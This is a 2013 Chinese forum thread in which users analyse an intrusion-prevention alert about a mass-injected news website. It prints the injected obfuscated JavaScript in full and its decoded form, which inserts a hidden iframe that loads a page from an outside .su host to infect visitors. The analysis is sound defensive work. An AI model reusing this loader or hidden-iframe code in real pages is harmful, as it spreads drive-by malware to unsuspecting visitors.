[未鉴定] 80

显示全部楼层 · 发表于 2013-4-27 15:36:27

2013/4/27 15:34:59 入侵防护重要传入 TCP 69.163.167.47 80 N/A 1.1.1.1 50480 N/A \DEVICE\HARDDISKVOLUME1\USERS\FIREFOX3\DESKTOP\SOFT\AD MUNCHER4.93\ADMUNCH.EXE 25744 70219 Web Attack: Mass Injection Website 2 www.chilebeta.com/2007/11/30/innovadores-vehiculo-impulsado-por-agua-y-aire-gano-concurso-&At Firefox3 WIN-V6CDPO2QG3K Default 1 2013/4/27 15:34:47 2013/4/27 15:34:47

www.chilebeta.com/2007/11/30/innovadores-vehiculo-impulsado-por-agua-y-aire-gano-concurso-&At

显示全部楼层 · 发表于 2013-4-27 19:07:31

<script>try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-2.75,-2.75,21.25,20.5,3,5,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,20.75,20.25,24,12.25,22,20.25,22.25,20.25,22.5,24,23.75,11.5,25.25,16,19.25,20.75,14.5,19.25,22.25,20.25,5,4.75,19.5,22.75,20,25.25,4.75,5.25,17.75,7,18.25,5.25,25.75,-1.75,-2.75,-2.75,-2.75,21.25,20.5,23.5,19.25,22.25,20.25,23.5,5,5.25,9.75,-1.75,-2.75,-2.75,26.25,3,20.25,22,23.75,20.25,3,25.75,-1.75,-2.75,-2.75,-2.75,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,24.75,23.5,21.25,24,20.25,5,3.5,10,21.25,20.5,23.5,19.25,22.25,20.25,3,23.75,23.5,19.75,10.25,4.75,21,24,24,23,9.5,6.75,6.75,21.5,19.25,21,20,21.25,24.5,21.25,20,20.25,22.75,22.5,20.25,23.5,23.75,6.5,23.75,24.25,6.75,22.25,19.25,21.25,22.5,6.5,23,21,23,10.75,23,19.25,20.75,20.25,10.25,8,20,9,7.25,20,8,19.75,8.25,8,20,8.75,7.25,19.5,7.75,8.5,19.75,4.75,3,24.75,21.25,20,24,21,10.25,4.75,7.25,7,4.75,3,21,20.25,21.25,20.75,21,24,10.25,4.75,7.25,7,4.75,3,23.75,24,25.25,22,20.25,10.25,4.75,24.5,21.25,23.75,21.25,19.5,21.25,22,21.25,24,25.25,9.5,21,21.25,20,20,20.25,22.5,9.75,23,22.75,23.75,21.25,24,21.25,22.75,22.5,9.5,19.25,19.5,23.75,22.75,22,24.25,24,20.25,9.75,22,20.25,20.5,24,9.5,7,9.75,24,22.75,23,9.5,7,9.75,4.75,10.5,10,6.75,21.25,20.5,23.5,19.25,22.25,20.25,10.5,3.5,5.25,9.75,-1.75,-2.75,-2.75,26.25,-1.75,-2.75,-2.75,20.5,24.25,22.5,19.75,24,21.25,22.75,22.5,3,21.25,20.5,23.5,19.25,22.25,20.25,23.5,5,5.25,25.75,-1.75,-2.75,-2.75,-2.75,24.5,19.25,23.5,3,20.5,3,10.25,3,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,19.75,23.5,20.25,19.25,24,20.25,12.25,22,20.25,22.25,20.25,22.5,24,5,4.75,21.25,20.5,23.5,19.25,22.25,20.25,4.75,5.25,9.75,20.5,6.5,23.75,20.25,24,11.25,24,24,23.5,21.25,19.5,24.25,24,20.25,5,4.75,23.75,23.5,19.75,4.75,6,4.75,21,24,24,23,9.5,6.75,6.75,21.5,19.25,21,20,21.25,24.5,21.25,20,20.25,22.75,22.5,20.25,23.5,23.75,6.5,23.75,24.25,6.75,22.25,19.25,21.25,22.5,6.5,23,21,23,10.75,23,19.25,20.75,20.25,10.25,8,20,9,7.25,20,8,19.75,8.25,8,20,8.75,7.25,19.5,7.75,8.5,19.75,4.75,5.25,9.75,20.5,6.5,23.75,24,25.25,22,20.25,6.5,24.5,21.25,23.75,21.25,19.5,21.25,22,21.25,24,25.25,10.25,4.75,21,21.25,20,20,20.25,22.5,4.75,9.75,20.5,6.5,23.75,24,25.25,22,20.25,6.5,23,22.75,23.75,21.25,24,21.25,22.75,22.5,10.25,4.75,19.25,19.5,23.75,22.75,22,24.25,24,20.25,4.75,9.75,20.5,6.5,23.75,24,25.25,22,20.25,6.5,22,20.25,20.5,24,10.25,4.75,7,4.75,9.75,20.5,6.5,23.75,24,25.25,22,20.25,6.5,24,22.75,23,10.25,4.75,7,4.75,9.75,20.5,6.5,23.75,20.25,24,11.25,24,24,23.5,21.25,19.5,24.25,24,20.25,5,4.75,24.75,21.25,20,24,21,4.75,6,4.75,7.25,7,4.75,5.25,9.75,20.5,6.5,23.75,20.25,24,11.25,24,24,23.5,21.25,19.5,24.25,24,20.25,5,4.75,21,20.25,21.25,20.75,21,24,4.75,6,4.75,7.25,7,4.75,5.25,9.75,-1.75,-2.75,-2.75,-2.75,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,20.75,20.25,24,12.25,22,20.25,22.25,20.25,22.5,24,23.75,11.5,25.25,16,19.25,20.75,14.5,19.25,22.25,20.25,5,4.75,19.5,22.75,20,25.25,4.75,5.25,17.75,7,18.25,6.5,19.25,23,23,20.25,22.5,20,11.75,21,21.25,22,20,5,20.5,5.25,9.75,-1.75,-2.75,-2.75,26.25];for(i=6-2-1-2-1;i-619!=0;i++){k=i;ss=ss+String["from"+"CharCode"](-1*2*h*(5+1*n[k]));}e(ss);}</script>

复制代码

解密下来：

if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }

复制代码

显示全部楼层 · 发表于 2013-4-27 19:08:59

另外今天试了下chrome自带的 js控制台
能看见载入的代码
：

<iframe src="http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

复制代码

这个坏处就是。。呵呵。。会中毒。。

[未鉴定] 80

评分